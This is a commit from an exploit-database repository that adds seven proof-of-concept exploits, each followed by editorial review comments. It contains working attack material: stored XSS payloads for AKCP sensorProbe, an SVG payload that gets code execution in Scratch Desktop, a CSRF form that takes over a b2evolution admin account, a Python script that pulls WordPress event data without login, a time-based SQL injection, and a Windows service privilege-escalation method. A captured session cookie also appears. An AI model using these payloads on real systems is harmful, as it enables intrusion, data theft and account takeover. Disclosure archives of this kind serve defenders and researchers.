DB: 2021-07-03
7 changes to exploits/shellcodes

WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control
Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)
b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)
Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)
Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)
Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)
parent 4f3cf46cbf
commit 5bd61e68a2
8 changed files with 530 additions and 0 deletions
67
exploits/hardware/webapps/50080.txt
Normal file
|
@ -0,0 +1,67 @@
|
|||
# Exploit Title: AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)
|
||||
# Date: 07-01-2021
|
||||
# Exploit Author: Tyler Butler
|
||||
# Vendor Homepage: https://www.akcp.com/
|
||||
# Software Link: https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/
|
||||
# Advisory: https://tbutler.org/2021/06/28/cve-2021-35956
|
||||
# Version: < SP480-20210624
|
||||
# CVE: CVE-2021-35956
|
||||
|
||||
# Description: Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.
|
||||
|
||||
|
||||
1) Stored Cross-Site Scripting via System Settings
|
||||
|
||||
POST /system?time=32e004c941f912 HTTP/1.1
|
||||
Host: [target]
|
||||
Content-Length: 114
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: http://[target]
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Referer: http://[target]/system?time=32e004c941f912
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
_SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save
|
||||
|
||||
2) Stored Cross-Site Scripting via Email Settings
|
||||
|
||||
POST /mail?time=32e004c941f912 HTTP/1.1
|
||||
Host: [target]
|
||||
Content-Length: 162
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: http://[target]
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Referer: http://[target]/mail?time=32e004c941f912
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
|
||||
_PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save
|
||||
|
||||
3) Stored Cross-Site Scripting via Sensor Description
|
||||
|
||||
POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1
|
||||
Host: [target]
|
||||
Content-Length: 55
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: http://[target]
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Referer: http://[target]/senswatr?index=0&time=32e004c941f912
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Cookie: CPCookie=sensors=400
|
||||
Connection: close
|
||||
|
||||
_WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save
|
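Review bot: The header of 50080.txt names two product identifiers without relating them: the title says "sensorProbe SPX476" while `# Version: < SP480-20210624` refers to an SP480 firmware build, so a reader cannot tell from this file which devices are affected. Suggest listing the affected models and stating the fixed firmware build explicitly, and writing `# Date: 07-01-2021` in ISO form, since it is ambiguous between 1 July and 7 January. The three requests also never say which `_SA0x` or `_PS0x` parameter corresponds to the fields named in the description, or which page later renders the stored value; one line per request naming the field and where it is displayed would let an operator check that output encoding is in place after upgrading.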
39
exploits/multiple/webapps/50079.txt
Normal file
|
@ -0,0 +1,39 @@
|
|||
# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
|
||||
# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
|
||||
# Date: 2021-06-18
|
||||
# Exploit Author: Stig Magnus Baugstø
|
||||
# Vendor Homepage: https://scratch.mit.edu/
|
||||
# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
|
||||
# Version: 3.10.2
|
||||
# Tested on: Windows 10 x64, but should be platform independent.
|
||||
# CVE: CVE-2020-7750
|
||||
|
||||
Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008
|
||||
|
||||
CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/
|
||||
|
||||
You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example:
|
||||
|
||||
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||
<image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" />
|
||||
</svg>
|
||||
|
||||
The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way.
|
||||
|
||||
Example of regular cross-site scripting (XSS):
|
||||
|
||||
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||
<image href="doesNotExist.png" onerror="alert('Pwned!')" />
|
||||
</svg>
|
||||
|
||||
The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE):
|
||||
|
||||
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||
<image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" />
|
||||
</svg>
|
||||
|
||||
The example above launches cmd.exe (Command Prompt) on Windows.
|
||||
|
||||
For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/
|
||||
|
||||
Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.
|
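Review bot: The version information in the header of 50079.txt contradicts the body: the title says "Scratch Desktop 3.17", `# Version: 3.10.2` gives only the tested build, and the summary line gives the affected range as `<3.17.1` with scratch-svg-renderer `<0.2.0-prerelease.20201019174008`. Suggest making `# Version:` carry the affected range and moving 3.10.2 to "Tested on", so that anyone checking an installed copy can read the fixed version from the header. The text also states that the SVG must lack the viewBox attribute without saying why; a sentence on that, or an explicit pointer to the linked write-up for it, would help someone reviewing the renderer's sanitisation. Minor: "21th" should be "21st" and "versions runs" should be "version runs".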
88
exploits/php/webapps/50081.txt
Normal file
|
@ -0,0 +1,88 @@
|
|||
# Exploit Title: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)
|
||||
# Exploit Author: Alperen Ergel (@alpernae)
|
||||
# Vendor Homepage: https://b2evolution.net/
|
||||
# Software Link: https://b2evolution.net/downloads/7-2-2
|
||||
# Version : 7.2.2
|
||||
# Tested on: Kali Linux
|
||||
# Category: WebApp
|
||||
|
||||
######## Description ########
|
||||
|
||||
Allows to attacker change admin account details.
|
||||
|
||||
######## Proof of Concept ########
|
||||
|
||||
===> REQUEST <====
|
||||
|
||||
POST /b2evolution/evoadm.php HTTP/1.1
|
||||
Host: s2.demo.opensourcecms.com
|
||||
Cookie: session_b2evo=1387_5XjmCda2lrphrrPvEEZqHq0CANmMmGDt;
|
||||
__cmpconsentx19318=CPIqFKEPIqFKEAfUmBENBgCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-
|
||||
zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPIqFKEgAADAAXAA0AB4AQ4DiQKnAAA;
|
||||
_ga=GA1.2.1294565572.1625137627; _gid=GA1.2.967259237.1625137627; __gads=ID=b3a3eb6f723d6f76-2210340b6fc800b7:T=1625137656:RT=1625137656:S=ALNI_MaB1e9iPH5NWYZhtIxGIyqg8LXMOA
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 1031
|
||||
Origin: https://s2.demo.opensourcecms.com
|
||||
Referer: https://s2.demo.opensourcecms.com/b2evolution/evoadm.php?blog=1&ctrl=user&user_tab=profile&user_ID=1&action=edit&user_tab=profile
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Te: trailers
|
||||
Connection: close
|
||||
|
||||
## < SNIPP >
|
||||
|
||||
edited_user_login=opensourcecms&edited_user_firstname=Hacker&edited_user_lastname=Hacker&edited_user_nickname=demo&edited_user_gender=M&edited_user_ctry_ID=233&edited_user_rgn_ID=&edited_user_subrg_ID=&edited_user_city_ID=
|
||||
&edited_user_age_min=&edited_user_age_max=&edited_user_birthday_month=&edited_user_birthday_day=&edited_user_birthday_year=&organizations%5B%5D=1&org_roles%5B%5D=King+of+Spades&org_priorities%5B%5D=&uf_1=I+am+the+demo+administrator+of+this+site.%0D%0AI+love+having+so+much+power%21&uf_new%5B2%5D%5B%5D=
|
||||
&uf_new%5B3%5D%5B%5D=&uf_2=https%3A%2F%2Ftwitter.com%2Fb2evolution%2F&uf_3=https%3A%2F%2Fwww.facebook.com%2Fb2evolution&uf_4=https%3A%2F%2Fplus.google.com%2F%2Bb2evolution%2Fposts&uf_5=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fb2evolution-net&uf_6=https%3A%2F%2Fgithub.com%2Fb2evolution%2Fb2evolution&uf_7=
|
||||
http%3A%2F%2Fb2evolution.net%2F&new_field_type=0&actionArray%5Bupdate%5D=Save+Changes%21&crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl&ctrl=user&user_tab=profile&identity_form=1&user_ID=1&orig_user_ID=1
|
||||
|
||||
|
||||
|
||||
|
||||
#### Proof-Of-Concept ####
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="https://s2.demo.opensourcecms.com/b2evolution/evoadm.php" method="POST">
|
||||
<input type="hidden" name="edited_user_login" value="CHANGEHERE" />
|
||||
<input type="hidden" name="edited_user_firstname" value="CHANGEHERE" />
|
||||
<input type="hidden" name="edited_user_lastname" value="CHANGEHERE" />
|
||||
<input type="hidden" name="edited_user_nickname" value="CHANGEHERE" />
|
||||
<input type="hidden" name="edited_user_gender" value="M" />
|
||||
<input type="hidden" name="edited_user_ctry_ID" value="233" />
|
||||
<input type="hidden" name="edited_user_rgn_ID" value="" />
|
||||
<input type="hidden" name="edited_user_subrg_ID" value="" />
|
||||
<input type="hidden" name="edited_user_city_ID" value="" />
|
||||
<input type="hidden" name="edited_user_age_min" value="" />
|
||||
<input type="hidden" name="edited_user_age_max" value="" />
|
||||
<input type="hidden" name="edited_user_birthday_month" value="" />
|
||||
<input type="hidden" name="edited_user_birthday_day" value="" />
|
||||
<input type="hidden" name="edited_user_birthday_year" value="" />
|
||||
<input type="hidden" name="organizations[]" value="1" />
|
||||
<input type="hidden" name="org_roles[]" value="King of Spades" />
|
||||
<input type="hidden" name="org_priorities[]" value="" />
|
||||
<input type="hidden" name="uf_1" value="I am the demo administrator of this site. I love having so much power!" />
|
||||
<input type="hidden" name="uf_new[2][]" value="" />
|
||||
<input type="hidden" name="uf_new[3][]" value="" />
|
||||
<input type="hidden" name="uf_2" value="https://twitter.com/b2evolution/" />
|
||||
<input type="hidden" name="uf_3" value="https://www.facebook.com/b2evolution" />
|
||||
<input type="hidden" name="uf_4" value="https://plus.google.com/+b2evolution/posts" />
|
||||
<input type="hidden" name="uf_5" value="https://www.linkedin.com/company/b2evolution-net" />
|
||||
<input type="hidden" name="uf_6" value="https://github.com/b2evolution/b2evolution" />
|
||||
<input type="hidden" name="uf_7" value="http://b2evolution.net/" />
|
||||
<input type="hidden" name="new_field_type" value="0" />
|
||||
<input type="hidden" name="actionArray[update]" value="Save Changes!" />
|
||||
<input type="hidden" name="crumb_user" value="zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl" />
|
||||
<input type="hidden" name="ctrl" value="user" />
|
||||
<input type="hidden" name="user_tab" value="profile" />
|
||||
<input type="hidden" name="identity_form" value="1" />
|
||||
<input type="hidden" name="user_ID" value="1" />
|
||||
<input type="hidden" name="orig_user_ID" value="1" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
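Review bot: The proof-of-concept form hard-codes `crumb_user` with the same value that appears in the captured request, and that field looks like a per-session anti-forgery token, so as written the file does not show that the server accepts the change without a valid token, which is what a CSRF finding has to establish. Suggest stating whether the request succeeds with `crumb_user` removed or stale, and adding the `# Date:` header line that the other entries in this commit carry. The captured request also includes a full `session_b2evo` cookie plus consent and analytics cookies from a public demo host; these should be replaced with placeholders, since they add nothing to the finding.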
122
exploits/php/webapps/50082.py
Executable file
File diff suppressed because one or more lines are too long
69
exploits/php/webapps/50084.py
Executable file
|
@ -0,0 +1,69 @@
|
|||
# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)
|
||||
# Date 01.07.2021
|
||||
# Exploit Author: Ron Jost (Hacker5preme)
|
||||
# Vendor Homepage: https://webnus.net/modern-events-calendar/
|
||||
# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip
|
||||
# Version: Before 5.16.5
|
||||
# Tested on: Ubuntu 18.04
|
||||
# CVE: CVE-2021-24146
|
||||
# CWE: CWE-863, CWE-284
|
||||
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24146/README.md
|
||||
|
||||
'''
|
||||
Description:
|
||||
Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin,
|
||||
versions before 5.16.5, did not properly restrict access to the export files,
|
||||
allowing unauthenticated users to exports all events data in CSV or XML format for example.
|
||||
'''
|
||||
|
||||
|
||||
'''
|
||||
Banner:
|
||||
'''
|
||||
banner = """
|
||||
_______ ________ ___ ____ ___ ___ ___ __ __ _____ __ _____
|
||||
/ ____/ | / / ____/ |__ \ / __ \__ \< / |__ \/ // /< / // / / ___/
|
||||
/ / | | / / __/________/ // / / /_/ // /_______/ / // /_/ / // /_/ __ \
|
||||
/ /___ | |/ / /__/_____/ __// /_/ / __// /_____/ __/__ __/ /__ __/ /_/ /
|
||||
\____/ |___/_____/ /____/\____/____/_/ /____/ /_/ /_/ /_/ \____/
|
||||
|
||||
* WordPress Plugin Modern Events Calendar Lite < 5.16.2 - Export Event Data (Unauthenticated)
|
||||
* @Hacker5preme
|
||||
|
||||
"""
|
||||
print(banner)
|
||||
|
||||
|
||||
'''
|
||||
Import required modules:
|
||||
'''
|
||||
import requests
|
||||
import argparse
|
||||
import csv
|
||||
|
||||
'''
|
||||
User-Input:
|
||||
'''
|
||||
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events CalendarExport Event Data (Unauthenticated)')
|
||||
my_parser.add_argument('-T', '--IP', type=str)
|
||||
my_parser.add_argument('-P', '--PORT', type=str)
|
||||
my_parser.add_argument('-U', '--PATH', type=str)
|
||||
args = my_parser.parse_args()
|
||||
target_ip = args.IP
|
||||
target_port = args.PORT
|
||||
wp_path = args.PATH
|
||||
|
||||
|
||||
'''
|
||||
Exploit:
|
||||
'''
|
||||
print('')
|
||||
print('[+] Exported Data: ')
|
||||
print('')
|
||||
exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv'
|
||||
answer = requests.get(exploit_url)
|
||||
decoded_content = answer.content.decode('utf-8')
|
||||
cr = csv.reader(decoded_content.splitlines(), delimiter=',')
|
||||
my_list = list(cr)
|
||||
for row in my_list:
|
||||
print(row)
|
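Review bot: The script prints `[+] Exported Data:` before the request is made and never checks `answer.status_code` or the response content type, so on a patched site a login redirect or error page would be split into rows and reported as exported data; anyone using it to confirm that the update to 5.16.5 took effect would get a false positive. Suggest checking the status and that the body is CSV before printing, and passing a `timeout` to `requests.get`. The three arguments are declared without `required=True` or help text, so omitting one fails with a TypeError at the string concatenation for `exploit_url`. The affected range is also stated three ways: the title says 5.16.2, the header says "Before 5.16.5", and the banner says "< 5.16.2".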
48
exploits/php/webapps/50085.txt
Normal file
|
@ -0,0 +1,48 @@
|
|||
# Exploit Title: Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)
|
||||
# Exploit Author: ircashem
|
||||
# Date 02.07.2021
|
||||
# Vendor Homepage: https://www.sourcecodester.com/
|
||||
# Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html
|
||||
# Version 1.0
|
||||
# Tested on: Ubuntu 20.04
|
||||
|
||||
####################
|
||||
# Proof of Concept #
|
||||
####################
|
||||
|
||||
POST /login.php HTTP/1.1
|
||||
Content-Length: 456
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: multipart/form-data; boundary=---------------------------238993435340593308934076060075
|
||||
Origin: http://localhost
|
||||
DNT: 1
|
||||
Referer: http://localhost/
|
||||
Cookie: PHPSESSID=v9j5jnmku4ags9lmp44ejah8im
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-GPC: 1
|
||||
Connection: close
|
||||
|
||||
-----------------------------238993435340593308934076060075
|
||||
Content-Disposition: form-data; name="username"
|
||||
|
||||
admin
|
||||
-----------------------------238993435340593308934076060075
|
||||
Content-Disposition: form-data; name="password"
|
||||
|
||||
admin' AND (SELECT 1 from (select sleep(5))a) -- -
|
||||
-----------------------------238993435340593308934076060075
|
||||
Content-Disposition: form-data; name="submit"
|
||||
|
||||
|
||||
-----------------------------238993435340593308934076060075--
|
||||
|
||||
###########
|
||||
# Payload #
|
||||
###########
|
||||
|
||||
username=admin
|
||||
password=admin' AND (SELECT 1 from (select sleep(5))a) -- -
|
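Review bot: The file gives a request and a payload but no description: it never states that the `password` field of `/login.php` is the injection point, that the payload is time-based, or what result confirms it (a response delayed by about five seconds). Suggest a short description block saying so, together with the remediation a maintainer should apply, for example a parameterised query for the login lookup. The header lines `# Date 02.07.2021` and `# Version 1.0` are missing the colon used by the other fields, and the `# Payload #` section repeats the multipart body values without adding anything.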
90
exploits/windows/local/50083.txt
Normal file
|
@ -0,0 +1,90 @@
|
|||
# Exploit Title: WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control
|
||||
# Date: 2021-07-01
|
||||
# Author: Andrea Intilangelo
|
||||
# Vendor Homepage: http://nica.it - http://winwastenet.com
|
||||
# Version: 1.0.6183.16475
|
||||
# Tested on: Windows 10 Pro x64 - 20H2 and 21H1
|
||||
|
||||
WinWaste.NET version 1.0.6183.16475 (from Nica s.r.l., a Zucchetti Group company) allows a local unprivileged user to replace the executable with a malicious file that will be executed with "LocalSystem" privileges.
|
||||
|
||||
(1) Affected service's executable: "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
|
||||
|
||||
(2) Attack Vectors: replacing the WinWasteService.exe and/or any tied .dll used by the software.
|
||||
|
||||
(3) Details:
|
||||
|
||||
C:\Users\user>sc qc winwasteservice
|
||||
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
|
||||
|
||||
NOME_SERVIZIO: winwasteservice
|
||||
TIPO : 10 WIN32_OWN_PROCESS
|
||||
TIPO_AVVIO : 2 AUTO_START
|
||||
CONTROLLO_ERRORE : 1 NORMAL
|
||||
NOME_PERCORSO_BINARIO : "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
|
||||
GRUPPO_ORDINE_CARICAMENTO :
|
||||
TAG : 0
|
||||
NOME_VISUALIZZATO : WinwasteService
|
||||
DIPENDENZE :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
|
||||
C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe Everyone:(I)(M)
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
BUILTIN\Administrators:(I)(F)
|
||||
BUILTIN\Users:(I)(RX)
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
|
||||
|
||||
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
|
||||
|
||||
C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
|
||||
C:\Program Files (x86)\WW.NET\WW.PROG\WINWASTESERVICE.EXE Everyone:(ID)C
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
BUILTIN\Administrators:(ID)F
|
||||
BUILTIN\Users:(ID)R
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R
|
||||
|
||||
C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG"
|
||||
C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(I)(OI)(CI)(M)
|
||||
NT SERVICE\TrustedInstaller:(I)(F)
|
||||
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
|
||||
BUILTIN\Administrators:(I)(F)
|
||||
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
|
||||
BUILTIN\Users:(I)(RX)
|
||||
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
|
||||
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)
|
||||
|
||||
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
|
||||
|
||||
|
||||
C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\"
|
||||
C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(OI)(CI)(ID)C
|
||||
NT SERVICE\TrustedInstaller:(ID)F
|
||||
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
|
||||
BUILTIN\Administrators:(ID)F
|
||||
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
|
||||
BUILTIN\Users:(ID)R
|
||||
BUILTIN\Users:(OI)(CI)(IO)(ID)(accesso speciale:)
|
||||
GENERIC_READ
|
||||
GENERIC_EXECUTE
|
||||
|
||||
CREATOR OWNER:(OI)(CI)(IO)(ID)F
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(OI)(CI)(IO)(ID)(accesso speciale:)
|
||||
GENERIC_READ
|
||||
GENERIC_EXECUTE
|
||||
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R
|
||||
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(OI)(CI)(IO)(ID)(accesso speciale:)
|
||||
GENERIC_READ
|
||||
GENERIC_EXECUTE
|
|
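Review bot: Every `Everyone` entry shown carries the `(I)` flag, both on WinWasteService.exe (`Everyone:(I)(M)`) and on the WW.PROG directory (`Everyone:(I)(OI)(CI)(M)`), which means the Modify grant is inherited from a parent directory that the file never shows. Suggest adding the `icacls` output for the directory where the ACE is set explicitly, since that is where an administrator has to remove it; stripping it from the executable alone would leave the DLLs mentioned in (2) writable. The `cacls` listings repeat the `icacls` results and could be dropped, and a note that the console output comes from an Italian-locale host would help readers matching field names such as NOME_PERCORSO_BINARIO.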
@ -11375,6 +11375,7 @@ id,file,description,date,author,type,platform,port
|
|||
50045,exploits/windows/local/50045.txt,"Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
|
||||
50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",2021-06-21,"Salman Asad",local,windows,
|
||||
50048,exploits/windows/local/50048.txt,"ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path",2021-06-22,"Julio Aviña",local,windows,
|
||||
50083,exploits/windows/local/50083.txt,"WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control",2021-07-02,"Andrea Intilangelo",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -44217,3 +44218,9 @@ id,file,description,date,author,type,platform,port
|
|||
50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",2021-07-01,"Salman Asad",webapps,php,
|
||||
50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",2021-07-01,"Ron Jost",webapps,php,
|
||||
50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple,
|
||||
50079,exploits/multiple/webapps/50079.txt,"Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)",2021-07-02,"Stig Magnus Baugstø",webapps,multiple,
|
||||
50080,exploits/hardware/webapps/50080.txt,"AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)",2021-07-02,"Tyler Butler",webapps,hardware,
|
||||
50081,exploits/php/webapps/50081.txt,"b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)",2021-07-02,"Alperen Ergel",webapps,php,
|
||||
50082,exploits/php/webapps/50082.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)",2021-07-02,"Ron Jost",webapps,php,
|
||||
50084,exploits/php/webapps/50084.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)",2021-07-02,"Ron Jost",webapps,php,
|
||||
